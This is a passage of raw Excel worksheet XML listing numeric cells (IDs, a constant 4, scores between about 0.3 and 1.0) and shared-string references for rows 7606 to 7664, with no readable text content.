        <v>6847</v>
      </c>
      <c r="D7606">
        <v>4</v>
      </c>
      <c r="E7606">
        <v>0.99589997529983521</v>
      </c>
      <c r="F7606" t="s">
        <v>13461</v>
      </c>
      <c r="G7606" t="s">
        <v>15049</v>
      </c>
      <c r="H7606" t="s">
        <v>15050</v>
      </c>
    </row>
    <row r="7607" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7607" s="1">
        <v>7605</v>
      </c>
      <c r="B7607">
        <v>6846</v>
      </c>
      <c r="C7607">
        <v>6846</v>
      </c>
      <c r="D7607">
        <v>4</v>
      </c>
      <c r="E7607">
        <v>0.9757000207901001</v>
      </c>
      <c r="F7607" t="s">
        <v>13461</v>
      </c>
      <c r="G7607" t="s">
        <v>15051</v>
      </c>
      <c r="H7607" t="s">
        <v>15052</v>
      </c>
    </row>
    <row r="7608" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7608" s="1">
        <v>7606</v>
      </c>
      <c r="B7608">
        <v>2367</v>
      </c>
      <c r="C7608">
        <v>2367</v>
      </c>
      <c r="D7608">
        <v>4</v>
      </c>
      <c r="E7608">
        <v>0.98089998960494995</v>
      </c>
      <c r="F7608" t="s">
        <v>13461</v>
      </c>
      <c r="G7608" t="s">
        <v>15053</v>
      </c>
      <c r="H7608" t="s">
        <v>15054</v>
      </c>
    </row>
    <row r="7609" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7609" s="1">
        <v>7607</v>
      </c>
      <c r="B7609">
        <v>6844</v>
      </c>
      <c r="C7609">
        <v>6844</v>
      </c>
      <c r="D7609">
        <v>4</v>
      </c>
      <c r="E7609">
        <v>0.62790000438690186</v>
      </c>
      <c r="F7609" t="s">
        <v>13461</v>
      </c>
      <c r="G7609" t="s">
        <v>15055</v>
      </c>
      <c r="H7609" t="s">
        <v>15056</v>
      </c>
    </row>
    <row r="7610" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7610" s="1">
        <v>7608</v>
      </c>
      <c r="B7610">
        <v>2425</v>
      </c>
      <c r="C7610">
        <v>2425</v>
      </c>
      <c r="D7610">
        <v>4</v>
      </c>
      <c r="E7610">
        <v>0.9659000039100647</v>
      </c>
      <c r="F7610" t="s">
        <v>13461</v>
      </c>
      <c r="G7610" t="s">
        <v>15057</v>
      </c>
      <c r="H7610" t="s">
        <v>15058</v>
      </c>
    </row>
    <row r="7611" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7611" s="1">
        <v>7609</v>
      </c>
      <c r="B7611">
        <v>6837</v>
      </c>
      <c r="C7611">
        <v>6837</v>
      </c>
      <c r="D7611">
        <v>4</v>
      </c>
      <c r="E7611">
        <v>0.57639998197555542</v>
      </c>
      <c r="F7611" t="s">
        <v>13461</v>
      </c>
      <c r="G7611" t="s">
        <v>15059</v>
      </c>
      <c r="H7611" t="s">
        <v>15060</v>
      </c>
    </row>
    <row r="7612" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7612" s="1">
        <v>7610</v>
      </c>
      <c r="B7612">
        <v>2435</v>
      </c>
      <c r="C7612">
        <v>2435</v>
      </c>
      <c r="D7612">
        <v>4</v>
      </c>
      <c r="E7612">
        <v>0.46189999580383301</v>
      </c>
      <c r="F7612" t="s">
        <v>13461</v>
      </c>
      <c r="G7612" t="s">
        <v>15061</v>
      </c>
      <c r="H7612" t="s">
        <v>15062</v>
      </c>
    </row>
    <row r="7613" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7613" s="1">
        <v>7611</v>
      </c>
      <c r="B7613">
        <v>6833</v>
      </c>
      <c r="C7613">
        <v>6833</v>
      </c>
      <c r="D7613">
        <v>4</v>
      </c>
      <c r="E7613">
        <v>0.66850000619888306</v>
      </c>
      <c r="F7613" t="s">
        <v>13461</v>
      </c>
      <c r="G7613" t="s">
        <v>15063</v>
      </c>
      <c r="H7613" t="s">
        <v>15064</v>
      </c>
    </row>
    <row r="7614" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7614" s="1">
        <v>7612</v>
      </c>
      <c r="B7614">
        <v>6832</v>
      </c>
      <c r="C7614">
        <v>6832</v>
      </c>
      <c r="D7614">
        <v>4</v>
      </c>
      <c r="E7614">
        <v>0.45109999179840088</v>
      </c>
      <c r="F7614" t="s">
        <v>13461</v>
      </c>
      <c r="G7614" t="s">
        <v>15065</v>
      </c>
      <c r="H7614" t="s">
        <v>15066</v>
      </c>
    </row>
    <row r="7615" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7615" s="1">
        <v>7613</v>
      </c>
      <c r="B7615">
        <v>2447</v>
      </c>
      <c r="C7615">
        <v>2447</v>
      </c>
      <c r="D7615">
        <v>4</v>
      </c>
      <c r="E7615">
        <v>0.64829999208450317</v>
      </c>
      <c r="F7615" t="s">
        <v>13461</v>
      </c>
      <c r="G7615" t="s">
        <v>15067</v>
      </c>
      <c r="H7615" t="s">
        <v>15068</v>
      </c>
    </row>
    <row r="7616" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7616" s="1">
        <v>7614</v>
      </c>
      <c r="B7616">
        <v>2451</v>
      </c>
      <c r="C7616">
        <v>2451</v>
      </c>
      <c r="D7616">
        <v>4</v>
      </c>
      <c r="E7616">
        <v>0.60530000925064087</v>
      </c>
      <c r="F7616" t="s">
        <v>13461</v>
      </c>
      <c r="G7616" t="s">
        <v>15069</v>
      </c>
      <c r="H7616" t="s">
        <v>15070</v>
      </c>
    </row>
    <row r="7617" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7617" s="1">
        <v>7615</v>
      </c>
      <c r="B7617">
        <v>6827</v>
      </c>
      <c r="C7617">
        <v>6827</v>
      </c>
      <c r="D7617">
        <v>4</v>
      </c>
      <c r="E7617">
        <v>0.52139997482299805</v>
      </c>
      <c r="F7617" t="s">
        <v>13461</v>
      </c>
      <c r="G7617" t="s">
        <v>15071</v>
      </c>
      <c r="H7617" t="s">
        <v>15072</v>
      </c>
    </row>
    <row r="7618" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7618" s="1">
        <v>7616</v>
      </c>
      <c r="B7618">
        <v>2453</v>
      </c>
      <c r="C7618">
        <v>2453</v>
      </c>
      <c r="D7618">
        <v>4</v>
      </c>
      <c r="E7618">
        <v>0.67830002307891846</v>
      </c>
      <c r="F7618" t="s">
        <v>13461</v>
      </c>
      <c r="G7618" t="s">
        <v>15073</v>
      </c>
      <c r="H7618" t="s">
        <v>15074</v>
      </c>
    </row>
    <row r="7619" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7619" s="1">
        <v>7617</v>
      </c>
      <c r="B7619">
        <v>2412</v>
      </c>
      <c r="C7619">
        <v>2412</v>
      </c>
      <c r="D7619">
        <v>4</v>
      </c>
      <c r="E7619">
        <v>0.49610000848770142</v>
      </c>
      <c r="F7619" t="s">
        <v>13461</v>
      </c>
      <c r="G7619" t="s">
        <v>15075</v>
      </c>
      <c r="H7619" t="s">
        <v>15076</v>
      </c>
    </row>
    <row r="7620" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7620" s="1">
        <v>7618</v>
      </c>
      <c r="B7620">
        <v>2289</v>
      </c>
      <c r="C7620">
        <v>2289</v>
      </c>
      <c r="D7620">
        <v>4</v>
      </c>
      <c r="E7620">
        <v>0.83520001173019409</v>
      </c>
      <c r="F7620" t="s">
        <v>13461</v>
      </c>
      <c r="G7620" t="s">
        <v>15077</v>
      </c>
      <c r="H7620" t="s">
        <v>15078</v>
      </c>
    </row>
    <row r="7621" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7621" s="1">
        <v>7619</v>
      </c>
      <c r="B7621">
        <v>2366</v>
      </c>
      <c r="C7621">
        <v>2366</v>
      </c>
      <c r="D7621">
        <v>4</v>
      </c>
      <c r="E7621">
        <v>0.76959997415542603</v>
      </c>
      <c r="F7621" t="s">
        <v>13461</v>
      </c>
      <c r="G7621" t="s">
        <v>15079</v>
      </c>
      <c r="H7621" t="s">
        <v>15080</v>
      </c>
    </row>
    <row r="7622" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7622" s="1">
        <v>7620</v>
      </c>
      <c r="B7622">
        <v>6862</v>
      </c>
      <c r="C7622">
        <v>6862</v>
      </c>
      <c r="D7622">
        <v>4</v>
      </c>
      <c r="E7622">
        <v>0.6064000129699707</v>
      </c>
      <c r="F7622" t="s">
        <v>13461</v>
      </c>
      <c r="G7622" t="s">
        <v>15081</v>
      </c>
      <c r="H7622" t="s">
        <v>15082</v>
      </c>
    </row>
    <row r="7623" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7623" s="1">
        <v>7621</v>
      </c>
      <c r="B7623">
        <v>2303</v>
      </c>
      <c r="C7623">
        <v>2303</v>
      </c>
      <c r="D7623">
        <v>4</v>
      </c>
      <c r="E7623">
        <v>0.7368999719619751</v>
      </c>
      <c r="F7623" t="s">
        <v>13461</v>
      </c>
      <c r="G7623" t="s">
        <v>15083</v>
      </c>
      <c r="H7623" t="s">
        <v>15084</v>
      </c>
    </row>
    <row r="7624" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7624" s="1">
        <v>7622</v>
      </c>
      <c r="B7624">
        <v>2309</v>
      </c>
      <c r="C7624">
        <v>2309</v>
      </c>
      <c r="D7624">
        <v>4</v>
      </c>
      <c r="E7624">
        <v>0.7750999927520752</v>
      </c>
      <c r="F7624" t="s">
        <v>13461</v>
      </c>
      <c r="G7624" t="s">
        <v>15085</v>
      </c>
      <c r="H7624" t="s">
        <v>15086</v>
      </c>
    </row>
    <row r="7625" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7625" s="1">
        <v>7623</v>
      </c>
      <c r="B7625">
        <v>2318</v>
      </c>
      <c r="C7625">
        <v>2318</v>
      </c>
      <c r="D7625">
        <v>4</v>
      </c>
      <c r="E7625">
        <v>0.52060002088546753</v>
      </c>
      <c r="F7625" t="s">
        <v>13461</v>
      </c>
      <c r="G7625" t="s">
        <v>15087</v>
      </c>
      <c r="H7625" t="s">
        <v>15088</v>
      </c>
    </row>
    <row r="7626" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7626" s="1">
        <v>7624</v>
      </c>
      <c r="B7626">
        <v>2320</v>
      </c>
      <c r="C7626">
        <v>2320</v>
      </c>
      <c r="D7626">
        <v>4</v>
      </c>
      <c r="E7626">
        <v>0.5658000111579895</v>
      </c>
      <c r="F7626" t="s">
        <v>13461</v>
      </c>
      <c r="G7626" t="s">
        <v>15089</v>
      </c>
      <c r="H7626" t="s">
        <v>15090</v>
      </c>
    </row>
    <row r="7627" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7627" s="1">
        <v>7625</v>
      </c>
      <c r="B7627">
        <v>2326</v>
      </c>
      <c r="C7627">
        <v>2326</v>
      </c>
      <c r="D7627">
        <v>4</v>
      </c>
      <c r="E7627">
        <v>0.57660001516342163</v>
      </c>
      <c r="F7627" t="s">
        <v>13461</v>
      </c>
      <c r="G7627" t="s">
        <v>15091</v>
      </c>
      <c r="H7627" t="s">
        <v>15092</v>
      </c>
    </row>
    <row r="7628" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7628" s="1">
        <v>7626</v>
      </c>
      <c r="B7628">
        <v>2332</v>
      </c>
      <c r="C7628">
        <v>2332</v>
      </c>
      <c r="D7628">
        <v>4</v>
      </c>
      <c r="E7628">
        <v>0.56590002775192261</v>
      </c>
      <c r="F7628" t="s">
        <v>13461</v>
      </c>
      <c r="G7628" t="s">
        <v>15093</v>
      </c>
      <c r="H7628" t="s">
        <v>15094</v>
      </c>
    </row>
    <row r="7629" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7629" s="1">
        <v>7627</v>
      </c>
      <c r="B7629">
        <v>2334</v>
      </c>
      <c r="C7629">
        <v>2334</v>
      </c>
      <c r="D7629">
        <v>4</v>
      </c>
      <c r="E7629">
        <v>0.89079999923706055</v>
      </c>
      <c r="F7629" t="s">
        <v>13461</v>
      </c>
      <c r="G7629" t="s">
        <v>15095</v>
      </c>
      <c r="H7629" t="s">
        <v>15096</v>
      </c>
    </row>
    <row r="7630" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7630" s="1">
        <v>7628</v>
      </c>
      <c r="B7630">
        <v>2339</v>
      </c>
      <c r="C7630">
        <v>2339</v>
      </c>
      <c r="D7630">
        <v>4</v>
      </c>
      <c r="E7630">
        <v>0.61299997568130493</v>
      </c>
      <c r="F7630" t="s">
        <v>13461</v>
      </c>
      <c r="G7630" t="s">
        <v>15097</v>
      </c>
      <c r="H7630" t="s">
        <v>15098</v>
      </c>
    </row>
    <row r="7631" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7631" s="1">
        <v>7629</v>
      </c>
      <c r="B7631">
        <v>2340</v>
      </c>
      <c r="C7631">
        <v>2340</v>
      </c>
      <c r="D7631">
        <v>4</v>
      </c>
      <c r="E7631">
        <v>0.83209997415542603</v>
      </c>
      <c r="F7631" t="s">
        <v>13461</v>
      </c>
      <c r="G7631" t="s">
        <v>15099</v>
      </c>
      <c r="H7631" t="s">
        <v>15100</v>
      </c>
    </row>
    <row r="7632" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7632" s="1">
        <v>7630</v>
      </c>
      <c r="B7632">
        <v>2365</v>
      </c>
      <c r="C7632">
        <v>2365</v>
      </c>
      <c r="D7632">
        <v>4</v>
      </c>
      <c r="E7632">
        <v>0.68389999866485596</v>
      </c>
      <c r="F7632" t="s">
        <v>13461</v>
      </c>
      <c r="G7632" t="s">
        <v>15101</v>
      </c>
      <c r="H7632" t="s">
        <v>15102</v>
      </c>
    </row>
    <row r="7633" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7633" s="1">
        <v>7631</v>
      </c>
      <c r="B7633">
        <v>2341</v>
      </c>
      <c r="C7633">
        <v>2341</v>
      </c>
      <c r="D7633">
        <v>4</v>
      </c>
      <c r="E7633">
        <v>0.99870002269744873</v>
      </c>
      <c r="F7633" t="s">
        <v>13461</v>
      </c>
      <c r="G7633" t="s">
        <v>15103</v>
      </c>
      <c r="H7633" t="s">
        <v>15104</v>
      </c>
    </row>
    <row r="7634" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7634" s="1">
        <v>7632</v>
      </c>
      <c r="B7634">
        <v>2343</v>
      </c>
      <c r="C7634">
        <v>2343</v>
      </c>
      <c r="D7634">
        <v>4</v>
      </c>
      <c r="E7634">
        <v>0.7750999927520752</v>
      </c>
      <c r="F7634" t="s">
        <v>13461</v>
      </c>
      <c r="G7634" t="s">
        <v>15105</v>
      </c>
      <c r="H7634" t="s">
        <v>15106</v>
      </c>
    </row>
    <row r="7635" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7635" s="1">
        <v>7633</v>
      </c>
      <c r="B7635">
        <v>2344</v>
      </c>
      <c r="C7635">
        <v>2344</v>
      </c>
      <c r="D7635">
        <v>4</v>
      </c>
      <c r="E7635">
        <v>0.633899986743927</v>
      </c>
      <c r="F7635" t="s">
        <v>13461</v>
      </c>
      <c r="G7635" t="s">
        <v>15107</v>
      </c>
      <c r="H7635" t="s">
        <v>15108</v>
      </c>
    </row>
    <row r="7636" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7636" s="1">
        <v>7634</v>
      </c>
      <c r="B7636">
        <v>2345</v>
      </c>
      <c r="C7636">
        <v>2345</v>
      </c>
      <c r="D7636">
        <v>4</v>
      </c>
      <c r="E7636">
        <v>0.32480001449584961</v>
      </c>
      <c r="F7636" t="s">
        <v>13461</v>
      </c>
      <c r="G7636" t="s">
        <v>15109</v>
      </c>
      <c r="H7636" t="s">
        <v>15110</v>
      </c>
    </row>
    <row r="7637" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7637" s="1">
        <v>7635</v>
      </c>
      <c r="B7637">
        <v>2350</v>
      </c>
      <c r="C7637">
        <v>2350</v>
      </c>
      <c r="D7637">
        <v>4</v>
      </c>
      <c r="E7637">
        <v>0.51319998502731323</v>
      </c>
      <c r="F7637" t="s">
        <v>13461</v>
      </c>
      <c r="G7637" t="s">
        <v>15111</v>
      </c>
      <c r="H7637" t="s">
        <v>15112</v>
      </c>
    </row>
    <row r="7638" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7638" s="1">
        <v>7636</v>
      </c>
      <c r="B7638">
        <v>2359</v>
      </c>
      <c r="C7638">
        <v>2359</v>
      </c>
      <c r="D7638">
        <v>4</v>
      </c>
      <c r="E7638">
        <v>0.99919998645782471</v>
      </c>
      <c r="F7638" t="s">
        <v>13461</v>
      </c>
      <c r="G7638" t="s">
        <v>15113</v>
      </c>
      <c r="H7638" t="s">
        <v>14953</v>
      </c>
    </row>
    <row r="7639" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7639" s="1">
        <v>7637</v>
      </c>
      <c r="B7639">
        <v>2360</v>
      </c>
      <c r="C7639">
        <v>2360</v>
      </c>
      <c r="D7639">
        <v>4</v>
      </c>
      <c r="E7639">
        <v>0.57179999351501465</v>
      </c>
      <c r="F7639" t="s">
        <v>13461</v>
      </c>
      <c r="G7639" t="s">
        <v>15114</v>
      </c>
      <c r="H7639" t="s">
        <v>15115</v>
      </c>
    </row>
    <row r="7640" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7640" s="1">
        <v>7638</v>
      </c>
      <c r="B7640">
        <v>6866</v>
      </c>
      <c r="C7640">
        <v>6866</v>
      </c>
      <c r="D7640">
        <v>4</v>
      </c>
      <c r="E7640">
        <v>0.40299999713897711</v>
      </c>
      <c r="F7640" t="s">
        <v>13461</v>
      </c>
      <c r="G7640" t="s">
        <v>15116</v>
      </c>
      <c r="H7640" t="s">
        <v>15117</v>
      </c>
    </row>
    <row r="7641" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7641" s="1">
        <v>7639</v>
      </c>
      <c r="B7641">
        <v>2361</v>
      </c>
      <c r="C7641">
        <v>2361</v>
      </c>
      <c r="D7641">
        <v>4</v>
      </c>
      <c r="E7641">
        <v>0.92250001430511475</v>
      </c>
      <c r="F7641" t="s">
        <v>13461</v>
      </c>
      <c r="G7641" t="s">
        <v>15118</v>
      </c>
      <c r="H7641" t="s">
        <v>15119</v>
      </c>
    </row>
    <row r="7642" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7642" s="1">
        <v>7640</v>
      </c>
      <c r="B7642">
        <v>2362</v>
      </c>
      <c r="C7642">
        <v>2362</v>
      </c>
      <c r="D7642">
        <v>4</v>
      </c>
      <c r="E7642">
        <v>0.97530001401901245</v>
      </c>
      <c r="F7642" t="s">
        <v>13461</v>
      </c>
      <c r="G7642" t="s">
        <v>15120</v>
      </c>
      <c r="H7642" t="s">
        <v>15121</v>
      </c>
    </row>
    <row r="7643" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7643" s="1">
        <v>7641</v>
      </c>
      <c r="B7643">
        <v>2342</v>
      </c>
      <c r="C7643">
        <v>2342</v>
      </c>
      <c r="D7643">
        <v>4</v>
      </c>
      <c r="E7643">
        <v>0.67890000343322754</v>
      </c>
      <c r="F7643" t="s">
        <v>13461</v>
      </c>
      <c r="G7643" t="s">
        <v>15122</v>
      </c>
      <c r="H7643" t="s">
        <v>15123</v>
      </c>
    </row>
    <row r="7644" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7644" s="1">
        <v>7642</v>
      </c>
      <c r="B7644">
        <v>2454</v>
      </c>
      <c r="C7644">
        <v>2454</v>
      </c>
      <c r="D7644">
        <v>4</v>
      </c>
      <c r="E7644">
        <v>0.78280001878738403</v>
      </c>
      <c r="F7644" t="s">
        <v>13461</v>
      </c>
      <c r="G7644" t="s">
        <v>15124</v>
      </c>
      <c r="H7644" t="s">
        <v>15125</v>
      </c>
    </row>
    <row r="7645" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7645" s="1">
        <v>7643</v>
      </c>
      <c r="B7645">
        <v>2111</v>
      </c>
      <c r="C7645">
        <v>2111</v>
      </c>
      <c r="D7645">
        <v>4</v>
      </c>
      <c r="E7645">
        <v>0.96640002727508545</v>
      </c>
      <c r="F7645" t="s">
        <v>13461</v>
      </c>
      <c r="G7645" t="s">
        <v>15126</v>
      </c>
      <c r="H7645" t="s">
        <v>15127</v>
      </c>
    </row>
    <row r="7646" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7646" s="1">
        <v>7644</v>
      </c>
      <c r="B7646">
        <v>6989</v>
      </c>
      <c r="C7646">
        <v>6989</v>
      </c>
      <c r="D7646">
        <v>4</v>
      </c>
      <c r="E7646">
        <v>0.91740000247955322</v>
      </c>
      <c r="F7646" t="s">
        <v>13461</v>
      </c>
      <c r="G7646" t="s">
        <v>15128</v>
      </c>
      <c r="H7646" t="s">
        <v>15129</v>
      </c>
    </row>
    <row r="7647" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7647" s="1">
        <v>7645</v>
      </c>
      <c r="B7647">
        <v>1812</v>
      </c>
      <c r="C7647">
        <v>1812</v>
      </c>
      <c r="D7647">
        <v>4</v>
      </c>
      <c r="E7647">
        <v>0.63929998874664307</v>
      </c>
      <c r="F7647" t="s">
        <v>13461</v>
      </c>
      <c r="G7647" t="s">
        <v>15130</v>
      </c>
      <c r="H7647" t="s">
        <v>15131</v>
      </c>
    </row>
    <row r="7648" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7648" s="1">
        <v>7646</v>
      </c>
      <c r="B7648">
        <v>1818</v>
      </c>
      <c r="C7648">
        <v>1818</v>
      </c>
      <c r="D7648">
        <v>4</v>
      </c>
      <c r="E7648">
        <v>0.77399998903274536</v>
      </c>
      <c r="F7648" t="s">
        <v>13461</v>
      </c>
      <c r="G7648" t="s">
        <v>15132</v>
      </c>
      <c r="H7648" t="s">
        <v>15133</v>
      </c>
    </row>
    <row r="7649" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7649" s="1">
        <v>7647</v>
      </c>
      <c r="B7649">
        <v>1824</v>
      </c>
      <c r="C7649">
        <v>1824</v>
      </c>
      <c r="D7649">
        <v>4</v>
      </c>
      <c r="E7649">
        <v>0.64829999208450317</v>
      </c>
      <c r="F7649" t="s">
        <v>13461</v>
      </c>
      <c r="G7649" t="s">
        <v>15134</v>
      </c>
      <c r="H7649" t="s">
        <v>15135</v>
      </c>
    </row>
    <row r="7650" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7650" s="1">
        <v>7648</v>
      </c>
      <c r="B7650">
        <v>1826</v>
      </c>
      <c r="C7650">
        <v>1826</v>
      </c>
      <c r="D7650">
        <v>4</v>
      </c>
      <c r="E7650">
        <v>0.83939999341964722</v>
      </c>
      <c r="F7650" t="s">
        <v>13461</v>
      </c>
      <c r="G7650" t="s">
        <v>15136</v>
      </c>
      <c r="H7650" t="s">
        <v>15137</v>
      </c>
    </row>
    <row r="7651" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7651" s="1">
        <v>7649</v>
      </c>
      <c r="B7651">
        <v>7099</v>
      </c>
      <c r="C7651">
        <v>7099</v>
      </c>
      <c r="D7651">
        <v>4</v>
      </c>
      <c r="E7651">
        <v>0.80839997529983521</v>
      </c>
      <c r="F7651" t="s">
        <v>13461</v>
      </c>
      <c r="G7651" t="s">
        <v>15138</v>
      </c>
      <c r="H7651" t="s">
        <v>15139</v>
      </c>
    </row>
    <row r="7652" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7652" s="1">
        <v>7650</v>
      </c>
      <c r="B7652">
        <v>1844</v>
      </c>
      <c r="C7652">
        <v>1844</v>
      </c>
      <c r="D7652">
        <v>4</v>
      </c>
      <c r="E7652">
        <v>0.70889997482299805</v>
      </c>
      <c r="F7652" t="s">
        <v>13461</v>
      </c>
      <c r="G7652" t="s">
        <v>15140</v>
      </c>
      <c r="H7652" t="s">
        <v>15141</v>
      </c>
    </row>
    <row r="7653" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7653" s="1">
        <v>7651</v>
      </c>
      <c r="B7653">
        <v>1852</v>
      </c>
      <c r="C7653">
        <v>1852</v>
      </c>
      <c r="D7653">
        <v>4</v>
      </c>
      <c r="E7653">
        <v>0.53839999437332153</v>
      </c>
      <c r="F7653" t="s">
        <v>13461</v>
      </c>
      <c r="G7653" t="s">
        <v>15142</v>
      </c>
      <c r="H7653" t="s">
        <v>15143</v>
      </c>
    </row>
    <row r="7654" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7654" s="1">
        <v>7652</v>
      </c>
      <c r="B7654">
        <v>1860</v>
      </c>
      <c r="C7654">
        <v>1860</v>
      </c>
      <c r="D7654">
        <v>4</v>
      </c>
      <c r="E7654">
        <v>0.61650002002716064</v>
      </c>
      <c r="F7654" t="s">
        <v>13461</v>
      </c>
      <c r="G7654" t="s">
        <v>15144</v>
      </c>
      <c r="H7654" t="s">
        <v>15145</v>
      </c>
    </row>
    <row r="7655" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7655" s="1">
        <v>7653</v>
      </c>
      <c r="B7655">
        <v>1882</v>
      </c>
      <c r="C7655">
        <v>1882</v>
      </c>
      <c r="D7655">
        <v>4</v>
      </c>
      <c r="E7655">
        <v>0.56199997663497925</v>
      </c>
      <c r="F7655" t="s">
        <v>13461</v>
      </c>
      <c r="G7655" t="s">
        <v>15146</v>
      </c>
      <c r="H7655" t="s">
        <v>15147</v>
      </c>
    </row>
    <row r="7656" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7656" s="1">
        <v>7654</v>
      </c>
      <c r="B7656">
        <v>1806</v>
      </c>
      <c r="C7656">
        <v>1806</v>
      </c>
      <c r="D7656">
        <v>4</v>
      </c>
      <c r="E7656">
        <v>0.85470002889633179</v>
      </c>
      <c r="F7656" t="s">
        <v>13461</v>
      </c>
      <c r="G7656" t="s">
        <v>15148</v>
      </c>
      <c r="H7656" t="s">
        <v>15149</v>
      </c>
    </row>
    <row r="7657" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7657" s="1">
        <v>7655</v>
      </c>
      <c r="B7657">
        <v>1898</v>
      </c>
      <c r="C7657">
        <v>1898</v>
      </c>
      <c r="D7657">
        <v>4</v>
      </c>
      <c r="E7657">
        <v>0.97759997844696045</v>
      </c>
      <c r="F7657" t="s">
        <v>13461</v>
      </c>
      <c r="G7657" t="s">
        <v>15150</v>
      </c>
      <c r="H7657" t="s">
        <v>15151</v>
      </c>
    </row>
    <row r="7658" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7658" s="1">
        <v>7656</v>
      </c>
      <c r="B7658">
        <v>7086</v>
      </c>
      <c r="C7658">
        <v>7086</v>
      </c>
      <c r="D7658">
        <v>4</v>
      </c>
      <c r="E7658">
        <v>0.81169998645782471</v>
      </c>
      <c r="F7658" t="s">
        <v>13461</v>
      </c>
      <c r="G7658" t="s">
        <v>15152</v>
      </c>
      <c r="H7658" t="s">
        <v>15153</v>
      </c>
    </row>
    <row r="7659" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7659" s="1">
        <v>7657</v>
      </c>
      <c r="B7659">
        <v>1909</v>
      </c>
      <c r="C7659">
        <v>1909</v>
      </c>
      <c r="D7659">
        <v>4</v>
      </c>
      <c r="E7659">
        <v>0.9692000150680542</v>
      </c>
      <c r="F7659" t="s">
        <v>13461</v>
      </c>
      <c r="G7659" t="s">
        <v>15154</v>
      </c>
      <c r="H7659" t="s">
        <v>15155</v>
      </c>
    </row>
    <row r="7660" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7660" s="1">
        <v>7658</v>
      </c>
      <c r="B7660">
        <v>1916</v>
      </c>
      <c r="C7660">
        <v>1916</v>
      </c>
      <c r="D7660">
        <v>4</v>
      </c>
      <c r="E7660">
        <v>0.80440002679824829</v>
      </c>
      <c r="F7660" t="s">
        <v>13461</v>
      </c>
      <c r="G7660" t="s">
        <v>15156</v>
      </c>
      <c r="H7660" t="s">
        <v>15157</v>
      </c>
    </row>
    <row r="7661" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7661" s="1">
        <v>7659</v>
      </c>
      <c r="B7661">
        <v>1923</v>
      </c>
      <c r="C7661">
        <v>1923</v>
      </c>
      <c r="D7661">
        <v>4</v>
      </c>
      <c r="E7661">
        <v>0.87940001487731934</v>
      </c>
      <c r="F7661" t="s">
        <v>13461</v>
      </c>
      <c r="G7661" t="s">
        <v>15158</v>
      </c>
      <c r="H7661" t="s">
        <v>15159</v>
      </c>
    </row>
    <row r="7662" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7662" s="1">
        <v>7660</v>
      </c>
      <c r="B7662">
        <v>1924</v>
      </c>
      <c r="C7662">
        <v>1924</v>
      </c>
      <c r="D7662">
        <v>4</v>
      </c>
      <c r="E7662">
        <v>0.54479998350143433</v>
      </c>
      <c r="F7662" t="s">
        <v>13461</v>
      </c>
      <c r="G7662" t="s">
        <v>15160</v>
      </c>
      <c r="H7662" t="s">
        <v>15161</v>
      </c>
    </row>
    <row r="7663" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7663" s="1">
        <v>7661</v>
      </c>
      <c r="B7663">
        <v>1926</v>
      </c>
      <c r="C7663">
        <v>1926</v>
      </c>
      <c r="D7663">
        <v>4</v>
      </c>
      <c r="E7663">
        <v>0.5275999903678894</v>
      </c>
      <c r="F7663" t="s">
        <v>13461</v>
      </c>
      <c r="G7663" t="s">
        <v>15162</v>
      </c>
      <c r="H7663" t="s">
        <v>15163</v>
      </c>
    </row>
    <row r="7664" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7664" s="1">
        <v>7662</v>
      </c>
      <c r="B7664">
        <v>1929</v>
      </c>
      <c r="C7664">
        <v>1929</v>
      </c>
      <c r="D7664">
        <v>4</v>
      </c>
      <c r="E7664">
        <v>0.57370001077651978</v>
      </c>
      <c r="F7664" t="s">
        <v>13461</v>
